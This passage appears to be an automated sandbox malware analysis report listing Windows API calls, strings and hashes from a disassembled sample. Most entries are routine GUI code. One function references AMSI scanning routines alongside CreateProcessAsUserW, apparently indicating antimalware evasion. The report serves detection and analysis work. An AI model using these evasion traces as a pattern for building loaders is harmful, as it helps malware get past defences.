                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0409BA86
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0409BA98
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0409BAAA
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0409BABC
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0409BACE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                    • API String ID: 2238633743-2910565190
                                                                                                    • Opcode ID: 2aae355981d072013faf026893cae698422ffa71f2b204bf1bf141f5b788abbc
                                                                                                    • Instruction ID: 1cd3a63602537b89e73cc3b787790cfd48b7f312380567eaf8cfbb5d9b121b17
                                                                                                    • Opcode Fuzzy Hash: 2aae355981d072013faf026893cae698422ffa71f2b204bf1bf141f5b788abbc
                                                                                                    • Instruction Fuzzy Hash: 54A1FBB0A40B50AFEF00EB65A8C5AA537F8FB167683100964A415EF205D6B9FCC8DF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 040B7041
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,040B718E,?,00008000), ref: 040B7065
                                                                                                    • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040B7072
                                                                                                    • LoadLibraryA.KERNEL32(imm32.dll,00000000,040B718E,?,00008000), ref: 040B708E
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmGetContext), ref: 040B70B0
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmReleaseContext), ref: 040B70C5
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmGetConversionStatus), ref: 040B70DA
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmSetConversionStatus), ref: 040B70EF
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmSetOpenStatus), ref: 040B7104
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionWindow), ref: 040B7119
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionFontA), ref: 040B712E
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmGetCompositionStringA), ref: 040B7143
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmIsIME), ref: 040B7158
                                                                                                    • GetProcAddress.KERNEL32(040DB54C,ImmNotifyIME), ref: 040B716D
                                                                                                    • SetErrorMode.KERNEL32(?,040B7195,00008000), ref: 040B7188
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                    • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                    • API String ID: 3397921170-3950384806
                                                                                                    • Opcode ID: 0fa902d7d005af0ad9305302bcb740b739803a965496e0143390881fa8438c05
                                                                                                    • Instruction ID: 614be598a66a9f9e8f5aecb9ba77b91cde1175e5e5fff680455636f46d390c74
                                                                                                    • Opcode Fuzzy Hash: 0fa902d7d005af0ad9305302bcb740b739803a965496e0143390881fa8438c05
                                                                                                    • Instruction Fuzzy Hash: CD3165B0941740AFEB00EFB59845BA537F8E785318B118825F545BB200DABE7CC8CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SelectObject.GDI32(?,?), ref: 04093708
                                                                                                    • SelectObject.GDI32(?,?), ref: 04093766
                                                                                                    • DeleteObject.GDI32(?), ref: 04093772
                                                                                                    • SelectObject.GDI32(?,?), ref: 040937BC
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0409383B
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0409385D
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 04093865
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 04093873
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0409389F
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 040938C4
                                                                                                    • SetTextColor.GDI32(?,?), ref: 040938CE
                                                                                                    • SetBkColor.GDI32(?,?), ref: 040938D8
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040938EB
                                                                                                    • DeleteObject.GDI32(?), ref: 040938F4
                                                                                                    • DeleteDC.GDI32(?), ref: 0409391F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$ColorSelectStretch$Delete$Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 516469703-0
                                                                                                    • Opcode ID: 12dbf6f1f9777930a51faa89a9ac9ed8cebc551ecc3ceea0b0d40b71524f6b7c
                                                                                                    • Instruction ID: 4229d6fb1e9d77b4c56abaa64ce6de6c1120821452e4c4f81bd6dd8e9f4cbb8d
                                                                                                    • Opcode Fuzzy Hash: 12dbf6f1f9777930a51faa89a9ac9ed8cebc551ecc3ceea0b0d40b71524f6b7c
                                                                                                    • Instruction Fuzzy Hash: E38171B1A00609AFDB50DEA8CD85EEF7BFCEB0C618F114954BA19F7240C636AD008B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 040B2DDF
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 040B2DF1
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040B2E07
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 040B2E1C
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 040B2E35
                                                                                                    • InflateRect.USER32(?,00000000,00000000), ref: 040B2E53
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 040B2E6D
                                                                                                    • DrawEdge.USER32(?,?,?,00000008), ref: 040B2F6C
                                                                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 040B2F85
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 040B2FAF
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040B2FD4
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 040B2FE5
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 040B2FFA
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 040B3016
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 1904870186-0
                                                                                                    • Opcode ID: 2169caa93945796c5fcda82f54b476e6a1f0f8ebf87eca8a557d41760cb607fb
                                                                                                    • Instruction ID: 0fdd576144aca0a4fac3316156d071952f4e6b296aa7ea7094d202f66bd3db63
                                                                                                    • Opcode Fuzzy Hash: 2169caa93945796c5fcda82f54b476e6a1f0f8ebf87eca8a557d41760cb607fb
                                                                                                    • Instruction Fuzzy Hash: 4CA12771E00208AFDB41DBA8C895EEEB3F9AF09308F1440A5E955FB251C775BE05DBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 0407296A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                    • API String ID: 2030045667-32948583
                                                                                                    • Opcode ID: a2649c7b47622ef705ecf264724be661fb8dd1e976cdaeb540181c3fff500f1f
                                                                                                    • Instruction ID: b4421313da8e8cdc3646cb2bb79fbec986b59fac44e8b77fe48c0bbac0e203d6
                                                                                                    • Opcode Fuzzy Hash: a2649c7b47622ef705ecf264724be661fb8dd1e976cdaeb540181c3fff500f1f
                                                                                                    • Instruction Fuzzy Hash: BBA1D630E042548BEF21AA2CC8C4BD876E4FB09758F1441EDE549BB342DB75A9C6CB5B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 040C8D04
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 040C8D1B
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 040C8D21
                                                                                                    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 040C8DAF
                                                                                                    • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 040C8DBB
                                                                                                    • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 040C8DCF
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 040C8D16
                                                                                                    • LoadLibraryExA, xrefs: 040C8D11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HugeRead$AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                    • API String ID: 1004233883-1650066521
                                                                                                    • Opcode ID: e0b5cc7925e56eb713b2e084d0bde20399ec6bf059e9bd0a66e4105aa39d8e88
                                                                                                    • Instruction ID: c02657c551ba3f7b8765140c508c1c278f7d6e9fb88546a677f031e2ac8de94a
                                                                                                    • Opcode Fuzzy Hash: e0b5cc7925e56eb713b2e084d0bde20399ec6bf059e9bd0a66e4105aa39d8e88
                                                                                                    • Instruction Fuzzy Hash: C3318372A00305FBEB50EFA4CC81F9E77A8AF15729F108514EA15BB281D771F990CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(?,00000054,?), ref: 04095667
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040956DB
                                                                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 040956FD
                                                                                                    • SelectObject.GDI32(?), ref: 04095753
                                                                                                    • SetBkColor.GDI32(?), ref: 0409578E
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 040957BC
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040957CF
                                                                                                    • DeleteObject.GDI32 ref: 040957DB
                                                                                                    • DeleteDC.GDI32(?), ref: 040957F1
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0409580C
                                                                                                    • DeleteDC.GDI32(00000000), ref: 04095828
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$Delete$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 1817384775-0
                                                                                                    • Opcode ID: 165641b4e0c392b6c02182dfb4a1aef5a815b901079e5b5e8f2d7f8687f8bc58
                                                                                                    • Instruction ID: 06e4d1775f919e048210968915aa724d5f4f808b5a3d6061749c3f654a01d023
                                                                                                    • Opcode Fuzzy Hash: 165641b4e0c392b6c02182dfb4a1aef5a815b901079e5b5e8f2d7f8687f8bc58
                                                                                                    • Instruction Fuzzy Hash: 6D513C72E10608BBEF11EBE9CC44FEEB7FCAB08718F004855B615FB280D675A9049B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0408FD38: GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
                                                                                                      • Part of subcall function 0408FD38: GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
                                                                                                      • Part of subcall function 0408FD38: FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4
                                                                                                    • CreateProcessAsUserW.ADVAPI32(041FEA3C,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,041FEBB8,041FEBFC,ScanString,041069E4,040CC330,OpenSession,041069E4), ref: 040CC05F
                                                                                                    • WaitForSingleObject.KERNEL32(041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,UacScan,041069E4), ref: 040CC2AB
                                                                                                    • CloseHandle.KERNEL32(041FEBFC,041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,UacScan), ref: 040CC2B6
                                                                                                    • CloseHandle.KERNEL32(041FEC00,041FEBFC,041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330), ref: 040CC2C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleProcess$AddressCreateCurrentFreeLibraryObjectProcSingleUserWait
                                                                                                    • String ID: Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                    • API String ID: 1235825717-661810597
                                                                                                    • Opcode ID: 549b95a746790b70374d2c1dc4fee7a9f73411914282267ef62b9fe3570f7803
                                                                                                    • Instruction ID: ab3d0c618fdd31349c7b4132ba9502cf782ed0b01d14b6afb3a0e344e1fd2af7
                                                                                                    • Opcode Fuzzy Hash: 549b95a746790b70374d2c1dc4fee7a9f73411914282267ef62b9fe3570f7803
                                                                                                    • Instruction Fuzzy Hash: 50F1FD31E10159DBFB50EBA4D980BCEB7B9AF4520CF118165E108BB264DB34BD468F9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 0407746F
                                                                                                    • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 0407747B
                                                                                                    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 04077493
                                                                                                    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040774B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFormatMessageRegisterSend
                                                                                                    • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                    • API String ID: 1437703442-3736581797
                                                                                                    • Opcode ID: a9a78b8864fb31aa425399b5ee6b96a2ae1a1b34aef71b7ee598d5d687c65601
                                                                                                    • Instruction ID: ceff1bee0dd006eda1752d020062ca3d04b45a7f3775292c585c99e2cbbdb185
                                                                                                    • Opcode Fuzzy Hash: a9a78b8864fb31aa425399b5ee6b96a2ae1a1b34aef71b7ee598d5d687c65601
                                                                                                    • Instruction Fuzzy Hash: 99113070B84305AFE711AFA5DC41F66BBE8EF44794F108465FA44AF240E7B0B941CB6A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 040BF143
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 040BF161
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF16E
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF17B
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF188
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 040BF195
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 040BF1A2
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 040BF1AF
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 040BF1CD
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 040BF1E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                    • Instruction ID: c9f07f534006ad720041494db6eef62e255d19cb02452b10114f9596e90b75e2
                                                                                                    • Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                    • Instruction Fuzzy Hash: AE216870784705BAF720EB24CC8DFDA7AD85B00B1CF0148A0BA49BF6D2C7B5BA448758
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • An unexpected memory leak has occurred. , xrefs: 0407272C
                                                                                                    • bytes: , xrefs: 040727F9
                                                                                                    • Unexpected Memory Leak, xrefs: 0407295C
                                                                                                    • 7, xrefs: 0407273D
                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 040728E5
                                                                                                    • , xrefs: 040728B0
                                                                                                    • The unexpected small block leaks are:, xrefs: 040727A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                    • API String ID: 0-2723507874
                                                                                                    • Opcode ID: 0d9af927a3607a0c31042507bf3a754ddf2e34cdc08aecb534ddf84e4cd9dd37
                                                                                                    • Instruction ID: 7f1e1b836ec84ff1c2f59643e9aadf94dee4d7dd72e9c8dcc05b431014cc3315
                                                                                                    • Opcode Fuzzy Hash: 0d9af927a3607a0c31042507bf3a754ddf2e34cdc08aecb534ddf84e4cd9dd37
                                                                                                    • Instruction Fuzzy Hash: A571F830E042588BEF619B2CC884BD8B6E4FB49714F1440E9D549FB242DB75A9C5CF5B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA1AB
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA1C5
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA1F3
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA209
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA241
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AA259
                                                                                                    • MulDiv.KERNEL32(?), ref: 040AA2B0
                                                                                                    • MulDiv.KERNEL32(?), ref: 040AA2DA
                                                                                                    • MulDiv.KERNEL32(00000000), ref: 040AA300
                                                                                                      • Part of subcall function 04092518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04092525
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4c1ff6d16d4ab9dff2b3ebbf9d44987e39a0ba787ba11283991ee2ab9d489a07
                                                                                                    • Instruction ID: a167afb67d64af324c2e5ed61548ef85cde0a205737b918585bbdba882339a30
                                                                                                    • Opcode Fuzzy Hash: 4c1ff6d16d4ab9dff2b3ebbf9d44987e39a0ba787ba11283991ee2ab9d489a07
                                                                                                    • Instruction Fuzzy Hash: 09514C71708B50AFD320DAA9C844BAAB7F9AF45318F04481DF9D6D7281D63AF864CF21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • lstrcpyn.KERNEL32(?,?,?), ref: 04075C7C
                                                                                                    • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 04075CE0
                                                                                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 04075D16
                                                                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 04075D7B
                                                                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 04075D87
                                                                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 04075DA9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$lstrlen
                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                    • API String ID: 4046762626-1565342463
                                                                                                    • Opcode ID: 12f8d96eae78e578210b5a4df42cec4e3045031e5b97befd3743c19d8e43fe81
                                                                                                    • Instruction ID: c043beb4795c900ddf13659dc873c58ae1270103e6a53978348323fc561fe6de
                                                                                                    • Opcode Fuzzy Hash: 12f8d96eae78e578210b5a4df42cec4e3045031e5b97befd3743c19d8e43fe81
                                                                                                    • Instruction Fuzzy Hash: 18417F71D00659BFEB20DEE8CC88BDEB7FCEF48208F0485A5A544F7240E670AE508B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 040966C6
                                                                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0409677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04096734
                                                                                                    • SelectObject.GDI32(?,?), ref: 04096773
                                                                                                    • DeleteObject.GDI32(00000000), ref: 04096779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$DeleteErrorLast
                                                                                                    • String ID: ($BM
                                                                                                    • API String ID: 1836871137-2980357723
                                                                                                    • Opcode ID: 94eff14008940ac00b6bf386c0395b38444d539c293aa40a337fbd31a987e882
                                                                                                    • Instruction ID: 26809adeb540bda4be47c9ea7b4eec6e1272245fb859fb9d9c3ac610075219f4
                                                                                                    • Opcode Fuzzy Hash: 94eff14008940ac00b6bf386c0395b38444d539c293aa40a337fbd31a987e882
                                                                                                    • Instruction Fuzzy Hash: E4D12A70E002189FDF54EFA8C894BAEBBF5EF49318F008965E904BB294D735AC40DB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(?,?,?), ref: 040AE650
                                                                                                    • UnregisterClassA.USER32(?,?), ref: 040AE678
                                                                                                    • RegisterClassA.USER32(?), ref: 040AE68E
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 040AE6CA
                                                                                                    • GetWindowLongA.USER32(00000000,000000F4), ref: 040AE6DF
                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 040AE6F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 717780171-2766056989
                                                                                                    • Opcode ID: a20b9a53fcf98c47abe3522add46ae43f8ed44320023e5bec12740613f096df5
                                                                                                    • Instruction ID: 6383ec811652fb39a36c91bc5f8dcdbfd36a01889244e1f5cce8c0a8a8e98e40
                                                                                                    • Opcode Fuzzy Hash: a20b9a53fcf98c47abe3522add46ae43f8ed44320023e5bec12740613f096df5
                                                                                                    • Instruction Fuzzy Hash: C2519C30A003549BEB20EBB8CC44BDE77F9AF05348F0449A9E855FB291DB34B955CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 040C0715
                                                                                                    • GetCapture.USER32 ref: 040C0724
                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 040C072A
                                                                                                    • ReleaseCapture.USER32 ref: 040C072F
                                                                                                    • GetActiveWindow.USER32 ref: 040C0780
